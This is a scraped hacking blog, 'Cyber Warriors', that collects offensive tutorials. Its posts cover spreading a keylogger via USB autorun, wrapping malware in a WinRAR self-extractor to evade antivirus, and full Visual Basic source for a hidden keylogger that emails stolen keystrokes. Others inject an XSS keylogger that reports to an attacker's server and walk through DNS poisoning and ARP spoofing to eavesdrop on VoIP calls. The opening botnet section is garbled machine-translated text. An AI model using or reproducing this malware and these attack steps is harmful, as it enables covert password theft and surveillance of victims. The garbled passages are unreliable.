Cyber Warriors

What is Botnet ?



Botnet is a network of private computers infected with malicious software and controlled as a group without the owners' knowledge, e.g., to send spam messages....

The onset of the attack techniques in today's technology, one of the most important botnet attacks that .. In general, considering the, is a type of malicious software is hard-coded .. The backbone of DDoS attacks....Determined to attack on an address code is a set of integrated .. But it is more dangerous than a normal ddos attack.

If the features of the sort used briefly threatening situations;

* Thanks to Web addresses via pop-up allows you to advertise an address can also, in general, is a        method used by companies in order to promote ..
* Virus, Logger, and so on. may contain malicious software, computer users, their passwords, 2    information disclosure allows parties to be shared ..
* Infect computer networks, data from all the computers on the network share it, so that it becomes    overrun Information Security ..
* Spam providing for the use of the e-mails out of the circulation of annoying advertising allows  mails ..
Lined up against the user can cause this and similar methods.. In todaSyC'RsO tLeL cMhE nBoAlCoKg TyO, T HaEn T OoPr.dinary internet users; botnet network installation has become inevitable, namely MP3s downloaded from on the internet,
wallpaper, screensaver, videos, software programs, etc.. before you start on a small scale by a simple code that hackers can then be integrated as a result of the spread of this data allows for botnet which has become a huge mass.

One of the uses of botnet Mirc scripts, this is a huge botnet on chat systems, and where there is a huge virtual world without being aware of net users started to play the role of hooked fish ..
Hang bait, you're aware of the botnet ddos attack on any channel is found set by the owner, advertising messages on the servers will result in the desired
server, the port is added to the desired number of boats to attack .. In addition
to these without being aware of the internet browser, Login ID, except that
consent has changed their set, and the right to make changes in the Options
section of your hand is already taken ..
When you restart the computer, boot your system back up and running again,
and will continue to see the activity on the server ..
Engelleyemeyeceğinizi's worth noting that this type of attack 100%, but this
kind of attack must be taken to protect you, to take steps in this regard can
make a few;
* Continuous updating the computer, the operating system's latest version
şekillendirmelisiniz ..
* If your system updates itself, and the use of frequent difficulty of not going
down, filter, use an antivirus program high ..

READMORE
 

Spoof mac on macosx


This tutorial is for mac users only. As i will explain how to spoof your mac address on MacOsx.
Mac spoofing is useful! Ok lets start.

1: Open terminal and type. 

                       Code
-----------------------------------------
ifconfig en1 | grep ether
-----------------------------------------

2: This will show you your current mac address.

3: Spoofing your mac address.for spoofing your mac address type. (you can type any mac adress but  64 bit adress)
 
                        Code
-------------------------------------------------
sudo ifconfig en1 ether 00:e2:e3:e4:e5:e6
-------------------------------------------------

4: Verify you''s adress by useing 1step command write down youe real mac adress and put it in a safe spot. just incase you lose your brain, and dont know where u put your original mac address.



NOTE:

Write down youe real mac adress and put it in a safe spot. just incase you lose your brain, and dont know where u put your original mac address.

READMORE
 

Spread your Keylogger&Rat using USB (Auto-run)



1: Creating autorun.inf Open notepad and copy the following code to it.

                                        Code
---------------------------------------------------------------
[autorun]
open=autorun.bat
icon=anything.ico
----------------------------------------------------------------

2: Save file as autorun.inf is the file we want to execute when our CD/USB is inserted. Anything.ico    is the name of icon file we want to set to our CD/USB drive.

3:Creating autorun.bat Open notepad and copy the following code to it.If it is saved in a folder named Cyberwarriors488 which is present in the root directory of CD/USB . Then
the code should be like this

                                         Code
---------------------------------------------------------------
@echo off
start Cyberwarriors488/keylogger.exe
----------------------------------------------------------------

4: Save it as autorun.bat and place it in the root directory of the CD/USB

Give this CD/USB to your friends and when they will insert this in their systems, the will be infected with your
keylogger.




READMORE
 

FUD Malware Using Winrar


It  works with everyfile, such as Darkcomet, .Net Files,Executables and every other Files...............

1:So first Download WinRAR
2:Then install it. Now it should be ready for use.
3:You have your Server.exe
4:Now select you Server and add to a Winrar Archive


5:Make sure you check "self-extracting" "solid-Archive" and "Protect Archive for changes" then go to    "advanced"



6:Add at "Directory to extract" "%temp%" <or add the Path where itshould extract the Files>Then at  "Execute after Extracting" add "Server.exe" <or the Name ofyour Virus, Trojan, etc.>Now navigate to  "Mode"


7:Check "hide all" <"I would recommend this because it will completely invisible at the Victims Machine">
8:Go to "Update"


9:Check "overwrite all Files". Now just click OK.
10:Goto "Select Password"


11:Use what ever Password you want, but remember this we will need it later.Click OK. and generate the
 File in my case "Server.sfx.exe"Now you just need to understand we used a password and WinrarEncrypts  the File for us. So it gets Undetectable. 
12:Open up Notepad and write the name of you encrypted Archive "-p(here the password) -d(here the  directory you used before to extractthe Files.)"

                                                       Code

---------------------------------------------------------------------------
Server.sfx.exe -pabc123 -d%temp%
----------------------------------------------------------------------------

13:And Save it anyname something.BAT otherwise the whole process wont work.

14:Now you have both Files The last Step is Open up again Winrar and add these both "something.bat" and
 "Server.sfx-exe"Files in an Archive.


15:Goto SFX-Options




16:Click OK.







READMORE
 

100% FUD Email sending keylogger in Visual Basic.

          How to make a email sending keylogger in Visual Basic. 100% Fud



You want to steal someone's password but you don't want to spend even a single penny to buy those costly Remote keyloggers present on the net and that's the case with me too.So why not we design our own keylogger.

(A remote keylogger is a piece of software that logs every key pressed on the keyboard and sends it to the hacker sitting on other side.It can be his email,Irc or ICQ address where the key pressed by the victim goes.)

Today let's start with some programing.If you are already a programmer than this article is just for you.I'm going to provide you the source code for visual basic and with tutorial on how to implement it in your project.

1:Open Visual basic and Make a new project named MyKeylogger or anything else you want.

2:Now we need to add all the required items in our Visual basic Form.
Add:Textbox for capturing text.,
3timers :-Timer1 controls how often it will look for keystrokes.

Timer 2 controls how often it will try to mail results
Timer 3 controls how long the forum will be visible (1 millisecond by default)

3: Change the properties of the timer intervals so they can perform accurately.(intervals are in millisecond)
For:
Timer1, 10 (timer1 interval is set to 10 so that it does not record the same keystrokes twice,from being held down to long by the user,but still it suitable for fast typing.)
Timer2, 1500000
Timer3, 1

4: Now lets change the properties of Textbox1,
and Forum1

For Textbox1 we need to change the following
1. Set Read only to True
2. Set Multi line to True
3. Set MaxLength to 2147483647 (Max Value)

For Forum1 we need to change the following:
1. Set Opacity to 0%
2. Set show in taskbar to False

5:Now we need to add the code to our form1 as it is of no use without it.So I'm not going in further details for why and where you should add the code,just follow the below mentioned steps.5.1:Double click on the form1.
5.2:You will see some sorts of coding already present there.Erase it all.
5.3:Now you just have to paste under mentioned code in your form1 code window.

                                                          Code's                                
-------------------------------------------------------------------
Imports System.Net.Mail 'Mail Class

Public Class Form1
Dim result As Integer
Private Declare Function GetAsyncKeyState Lib "USER32" (ByVal vKey As Long) As Integer
Private Declare Function GetKeyState Lib "user32" (ByVal nVirtKey As Long) As Integer

Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
Timer1.Start()
Timer2.Start()
Timer3.Start()

End Sub
Public Function GetCapslock() As Boolean
' Return Or Set the Capslock toggle.

GetCapslock = CBool(GetKeyState(&H14) And 1)

End Function

Public Function GetShift() As Boolean

' Return Or Set the Capslock toggle.

GetShift = CBool(GetAsyncKeyState(&H10))

End Function
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
For i As Integer = 1 To 225
result = 0
result = GetAsyncKeyState(i)
If result = -32767 Then
If GetCapslock() = True And GetShift() = True Then
Select Case (i)
Case 192
TextBox1.Text = TextBox1.Text + "~"
Case 1
'TextBox1.Text = TextBox1.Text + "[Left Mouse Click]"
Case 64 To 90
TextBox1.Text = TextBox1.Text + Chr(i).ToString.ToLower
Case 97 To 122
TextBox1.Text = TextBox1.Text + Chr(i).ToString.ToLower
Case 32
TextBox1.Text = TextBox1.Text + " "
Case 48
TextBox1.Text = TextBox1.Text + ")"
Case 49
TextBox1.Text = TextBox1.Text + "!"
Case 50
TextBox1.Text = TextBox1.Text + "@"
Case 51
TextBox1.Text = TextBox1.Text + "#"
Case 52
TextBox1.Text = TextBox1.Text + "$"
Case 53
TextBox1.Text = TextBox1.Text + "%"
Case 54
TextBox1.Text = TextBox1.Text + "^"
Case 55
TextBox1.Text = TextBox1.Text + "&"
Case 56
TextBox1.Text = TextBox1.Text + "*"
Case 57
TextBox1.Text = TextBox1.Text + "("
Case 8
TextBox1.Text = TextBox1.Text + "[BackSpace]"
Case 46
TextBox1.Text = TextBox1.Text + "[Del]"
Case 190
TextBox1.Text = TextBox1.Text + ">"
Case 16
Case 160 To 165
Case 17
TextBox1.Text = TextBox1.Text + "[Ctrl]"
Case 18
TextBox1.Text = TextBox1.Text + "[Alt]"
Case 189
TextBox1.Text = TextBox1.Text + "_"
Case 187
TextBox1.Text = TextBox1.Text + "+"
Case 219
TextBox1.Text = TextBox1.Text + "{"
Case 221
TextBox1.Text = TextBox1.Text + "}"
Case 186
TextBox1.Text = TextBox1.Text + ":"
Case 222
TextBox1.Text = TextBox1.Text + """"
Case 188
TextBox1.Text = TextBox1.Text + "<"
Case 191
TextBox1.Text = TextBox1.Text + "?"
Case 220
TextBox1.Text = TextBox1.Text + "|"
Case 13
TextBox1.Text = TextBox1.Text + " [Enter]" + vbNewLine
Case 20
Case 91 'windows key
Case 9
TextBox1.Text = TextBox1.Text + " [Tab]"
Case 2
TextBox1.Text = TextBox1.Text + " [RightMouseClick]"
Case 37 To 40
Case Else
TextBox1.Text = TextBox1.Text + " Ascii(" + i.ToString + ") "
End Select
End If
If GetCapslock() = True And GetShift() = False Then
Select Case (i)
Case 91 'windows key
Case 1
'TextBox1.Text = TextBox1.Text + "[Left Mouse Click]"
Case 64 To 90
TextBox1.Text = TextBox1.Text + Chr(i)
Case 97 To 122
TextBox1.Text = TextBox1.Text + Chr(i)
Case 32
TextBox1.Text = TextBox1.Text + " "
Case 48 To 57
TextBox1.Text = TextBox1.Text + Chr(i)
Case 8
TextBox1.Text = TextBox1.Text + "[BackSpace]"
Case 46
TextBox1.Text = TextBox1.Text + "[Del]"
Case 190
TextBox1.Text = TextBox1.Text + "."
Case 16
Case 160 To 165
Case 20
Case 192
TextBox1.Text = TextBox1.Text + "`"
Case 189
TextBox1.Text = TextBox1.Text + "-"
Case 187
TextBox1.Text = TextBox1.Text + "="

Case 219
TextBox1.Text = TextBox1.Text + "["
Case 221
TextBox1.Text = TextBox1.Text + "]"
Case 186
TextBox1.Text = TextBox1.Text + ";"
Case 222
TextBox1.Text = TextBox1.Text + "'"
Case 188
TextBox1.Text = TextBox1.Text + ","
Case 191
TextBox1.Text = TextBox1.Text + "/"
Case 220
TextBox1.Text = TextBox1.Text + "\"
Case 17
TextBox1.Text = TextBox1.Text + "[Ctrl]"
Case 18
TextBox1.Text = TextBox1.Text + "[Alt]"
Case 13
TextBox1.Text = TextBox1.Text + " [Enter]" + vbNewLine
Case 9
TextBox1.Text = TextBox1.Text + " [Tab]"
Case 2
TextBox1.Text = TextBox1.Text + " [RightMouseClick]"
Case 37 To 40
Case Else
TextBox1.Text = TextBox1.Text + " Ascii(" + i.ToString + ") "
End Select
End If
If GetCapslock() = False And GetShift() = True Then
Select Case (i)
Case 91 'windows key
Case 192
TextBox1.Text = TextBox1.Text + "~"
Case 1
' TextBox1.Text = TextBox1.Text + "[Left Mouse Click]"
Case 64 To 90
TextBox1.Text = TextBox1.Text + Chr(i)
Case 97 To 122
TextBox1.Text = TextBox1.Text + Chr(i)
Case 32
TextBox1.Text = TextBox1.Text + " "
Case 48
TextBox1.Text = TextBox1.Text + ")"
Case 49
TextBox1.Text = TextBox1.Text + "!"
Case 50
TextBox1.Text = TextBox1.Text + "@"
Case 51
TextBox1.Text = TextBox1.Text + "#"
Case 52
TextBox1.Text = TextBox1.Text + "$"
Case 53
TextBox1.Text = TextBox1.Text + "%"
Case 54
TextBox1.Text = TextBox1.Text + "^"
Case 55
TextBox1.Text = TextBox1.Text + "&"
Case 56
TextBox1.Text = TextBox1.Text + "*"
Case 57
TextBox1.Text = TextBox1.Text + "("
Case 8
TextBox1.Text = TextBox1.Text + "[BackSpace]"
Case 46
TextBox1.Text = TextBox1.Text + "[Del]"
Case 190
TextBox1.Text = TextBox1.Text + ">"
Case 16
Case 160 To 165
Case 17
TextBox1.Text = TextBox1.Text + "[Ctrl]"
Case 18
TextBox1.Text = TextBox1.Text + "[Alt]"
Case 189
TextBox1.Text = TextBox1.Text + "_"
Case 187
TextBox1.Text = TextBox1.Text + "+"
Case 219
TextBox1.Text = TextBox1.Text + "{"
Case 221
TextBox1.Text = TextBox1.Text + "}"
Case 186
TextBox1.Text = TextBox1.Text + ":"
Case 222
TextBox1.Text = TextBox1.Text + """"
Case 188
TextBox1.Text = TextBox1.Text + "<"
Case 191
TextBox1.Text = TextBox1.Text + "?"
Case 220
TextBox1.Text = TextBox1.Text + "|"
Case 13
TextBox1.Text = TextBox1.Text + " [Enter]" + vbNewLine
Case 9
TextBox1.Text = TextBox1.Text + " [Tab]"
Case 20
Case 2
TextBox1.Text = TextBox1.Text + " [RightMouseClick]"
Case 37 To 40
Case Else
TextBox1.Text = TextBox1.Text + " Ascii(" + i.ToString + ") "
End Select
End If
If GetCapslock() = False And GetShift() = False Then
Select Case (i)
Case 1
' TextBox1.Text = TextBox1.Text + "[Left Mouse Click]"
Case 64 To 90
TextBox1.Text = TextBox1.Text + Chr(i).ToString.ToLower
Case 97 To 122
TextBox1.Text = TextBox1.Text + Chr(i).ToString.ToLower
Case 32
TextBox1.Text = TextBox1.Text + " "
Case 48 To 57
TextBox1.Text = TextBox1.Text + Chr(i)
Case 8
TextBox1.Text = TextBox1.Text + "[BackSpace]"
Case 46
TextBox1.Text = TextBox1.Text + "[Del]"
Case 190
TextBox1.Text = TextBox1.Text + "."
Case 16
Case 160 To 165
Case 20
Case 192
TextBox1.Text = TextBox1.Text + "`"
Case 189
TextBox1.Text = TextBox1.Text + "-"
Case 187
TextBox1.Text = TextBox1.Text + "="
Case 91 'windows key
Case 219
TextBox1.Text = TextBox1.Text + "["
Case 221
TextBox1.Text = TextBox1.Text + "]"
Case 186
TextBox1.Text = TextBox1.Text + ";"
Case 222
TextBox1.Text = TextBox1.Text + "'"
Case 188
TextBox1.Text = TextBox1.Text + ","
Case 191
TextBox1.Text = TextBox1.Text + "/"
Case 220
TextBox1.Text = TextBox1.Text + "\"
Case 17
TextBox1.Text = TextBox1.Text + "[Ctrl]"
Case 18
TextBox1.Text = TextBox1.Text + "[Alt]"
Case 13
TextBox1.Text = TextBox1.Text + " [Enter]" + vbNewLine
Case 9
TextBox1.Text = TextBox1.Text + " [Tab]"
Case 2
TextBox1.Text = TextBox1.Text + " [RightMouseClick]"
Case 37 To 40

Case Else
TextBox1.Text = TextBox1.Text + " Ascii(" + i.ToString + ") "
End Select
End If

End If
Next i
End Sub

Sub MainEvents()
'Fill In all Required info, if your not using gmail use smtp . your email provider ex:
'"smpt.yahoo.com" or "smpt.custom_email.edu"
Try
Dim MyMailMessage As New MailMessage()
MyMailMessage.From = New MailAddress("cyberwarriors488.blogspot.com@gmail.com")
MyMailMessage.To.Add("cyberwarriors488.blogspot.com@gmail.com")
MyMailMessage.Subject = "Test"
MyMailMessage.Body = TextBox1.Text
Dim SMPT As New SmtpClient("smtp.gmail.com")
SMPT.Port = 587
SMPT.EnableSsl = True
SMPT.Credentials = New System.Net.NetworkCredential("cyberwarriors488.blogspot.com@gmail.com", "Your_Email_Password")
SMPT.Send(MyMailMessage)
TextBox1.Text = ""
Catch ex As Exception
End Try
End Sub

Private Sub Timer2_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer2.Tick

If TextBox1.Text <> "" Then
MainEvents()
End If
End Sub

Private Sub Timer3_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer3.Tick
Me.Visible = False
Me.Hide()
End Sub

End Class
--------------------------------------------------------------------------



READMORE
 

RDP Brute Force Tool



xTSCrack is a tool to assist the peneration tester find weak passwords over RDP protocol (3389). It is basically a RDP brute force tool.

Features:

Test for weak password automatically;
Test for weak/user passwords;
Wordlist option;
Userlist option;
Configurable port;
Range IP Address audit and more.












READMORE
 

Adrmax Keylogger Step by Step Tutorial



what is keylogger ?

Keylogger is a hardware device or a software program that records the real time activity of a computer user including the keyboard keys they press. These keyloggers allow not only keyboard keystrokes to be captured but also are often capable of collecting screen captures from the computer. The keys they press are programmed to automatically transmit data over the network to a remote computer or Web server.

1:After installing the program,past the crack file in installation directory


2:After Cracking , open it up. When you’ll open it, you’ll see an icon added into your system tray shown in pic below.







3:Now lets right click on that icon & then click on “Pre-config Installer”. Now  you should have something   as shown in pic below



4:Lets click on next and make sure that u should have the picture as below. 


5:Now next screen would give you “Invisibility” options. This will help you to hide your key logger   from your victim’s computer. 


6:Now next screen says “Security”, just click on NEXT.

7:Now the page that says “Web Update”, lets UNCHECK all off the boxes & click on NEXT.

8: Now you will see “Options” page. 


9:Now here comes the most important page, which will show u the options and will let u select     the way you want to receive the information from your victim’s computer.and click on Next!

10:Select Email and enter you email id & passwd and click on test and you check you email you receive a test mail and click on Ok




11:Send installer file your victim .





































READMORE
 

XSS Keylogger



XSS Keyloggers is  a simple way to grab informations a user type on a web page.Keylogging is the action of recording the keys struck on a keyboard.A keylogger can be used to spy on someone, grab their passwords, read their conversations or steal their personal informations.

1:Download xss keylogger.

2:Upload these files on any webhosting site.

3:Now open keylogger.js with any text editor & find the line "localhost" & replace it  with you website where you will be hosting your xss keylogger files.

4:injected script into the search field of any xss vulnerable site.To inject script on site use this script
----------------------------------------------------------
<script> src=your's javascript.jr uploaded link</script>
----------------------------------------------------------

5: Now after injecting the script. Let's check weather its working or not !. Just type anything in the search field. Now get back to your xss.php & check the logs. Any entered text on the webpage where we injected the script will be recorded & shown in our logs text file.




 xsskeylogger

READMORE
 

DNS-Poison attack






The job of a DNS is to convert the human readable addresses entered  into machine readable IP addresses.

For example when you type the URL (http://www.google.com) into the address bar the first thing that occurs is the nearest DNS server is contacted and the IP address of google domain is retrieved. Based on this IP address the website is opened.
So a DNS is a huge database that stores IP addresses of different domains. These are cached and updated on a regular basis.

DNS poisoning is also called DNS cache poisoning, and refers to the corruption of DNS tables and caches so that a domain name points to a malicious IP address. Once the user is re-directed to the malicious IP address his/her computer can be infected with worms, viruses, spy ware etc. Cache poisoning is mostly done through spam emails, or through web-links and banners that attracts users to click on them. A simple click causes the user to be re-directed to a DNS poisoned server.

How to create DNS-poison attack:



1: If your target DNS server is running Microsoft’s DNS server, on W2K SP 1 or 2, you can poison DNS using an alias. You have to have control of a zone (yourname.com) and a DNS server. You create a zone on your dns server under the name you want to poison (example.com). Your DNS server thinks it is authoritative for the example.com zone.

2: Next you create a host record in example.com that points to a host you control. In your real zone (yourname.com), you create a CNAME record for a host like spoof that points to hostname at example.com, like www.example.com. Then you point your local stub resolver at the target DNS server (most DNS servers will resolve for anyone by default). When you try to lookup spoof.yourname.com, the target DNS server will find your dns server. Your dns server will see that spoof.yourname.com is a CNAME for www.example.com and look that up. Since it thinks it is authoritative for example.com, it will ask itself, and return that IP address to the target DNS server. Now it is in the targets DNS cache. Anyone who tried to resolve www.example.com from that DNS server will get the IP address of the host you defined in the example.com zone.

3: Another way is to sniff the traffic of the target DNS server and when it tries to resolve a host name, feed it the result of your choosing before the recursive query finishes. The first response wins.



How to recover from a DNS-Poison attack:


1: You need to be absolutely positive that you have not been infected with spyware. Many spyware/adware programs today will modify the DNS settings or local hosts file on Windows machines. So you should run your personal spyware/adware detection tool.

2: Try to find out the IP address of the malicious DNS server(s) (check site to see if it has been reported)

3: You may want to block the IP address of the malicious DNS server at your border routers/firewalls so that your so that you cache does not become poisoned again.

4: Cleaning up from a site-wide DNS cache poisoning may require flushing the cache on all of your DNS servers in your organization probably starting with the most externally facing DNS boxes first.

5: On Windows DNS servers, you can stop/start the DNS service to clear the cache. You can also use the dnscmd.exe command from the
6: resource kit:

7. dnscmd.exe /ClearCache

8: On Windows 2000, XP, and 2003 clients, you can flush the client cache by running "ipconfig /flushdns". (Please note that this will do nothing to clean-up a poisoned DNS caching server upstream.)

9: On BIND 9, you can clear the cache by running "rndc" command and executing the "flush" command. On     BIND 8 or below, it appears that you have to restart the server.




READMORE
 

Sniff VoIP Calls


Hello friends Cyberwarriors are back with Amazing Tutorial Sniffing VoIP Calls With Wireshark.......

VoIP phones are implemented in every major organization and they are providing an attack surface for every malicious user that’s knows the basics of hacking. If there is no encryption in the communication media then an attacker could eavesdrop phone conversations which might impact the business in case that calls are classified as confidential.

A pentester should be able to identify if eavesdropping is possible on the voice network via the following technique.

ARP Poisoning:


The first step before implementing a Man-in-the-Middle attack is to enable IP forwarding in order to be able to route traffic from your system to the gateway with the following command:

echo 1 > /proc/sys/net/ipv4/ip_forward

Now you can perform a Man-in-the-Middle attack in order to be able to intercept VoIP traffic. This can be achieved really easy with the command below:




Capturing and Decoding VoIP Traffic


Now that the traffic is being routed to your box you can use Wireshark in order to sniff any SIP traffic. We are particularly interested for the RTP packets as they contain the actual conversation of a VoIP call.



Wireshark contains a built-in utility called VoIP calls which can decode RTP data into a playable audio format.




Secure your Network form this Attack:

As we saw it is very easy and fast to eavesdrop a phone call conversation just by performing a MiTM attack and having a tool like wireshark to sniff the traffic. In a VoIP assessments pentesters should try to implement this attack in order to identify if eavesdropping is possible. To prevent this attack companies should use the SRTP which is a secure protocol and provides encryption of the data being transferred so even if an attacker is able to capture the call it will be difficult to decrypt the data and to listen the message or we add voip pohens in different voip vlans................

 






READMORE
 

Email Spoofer by CyberWarriors



Email is the most comprehensive surveillance system ever created.

It’s easy for us to think that we are safe behind our web browsers and that nobody is watching what we do. The reality is that your online activities are constantly logged, tracked, and indexed by big business and government agencies. To keep your emails away from prying eyes, use an anonymous email address.


So, here we are, use our free  anonymous PhP Emailer

This Emailer sent mail in inbox folder 100%

Step 1:Upload life on free hosting 

Step 2:Fill the information and click on send ..!!!

Passwd=cyberwarriors













READMORE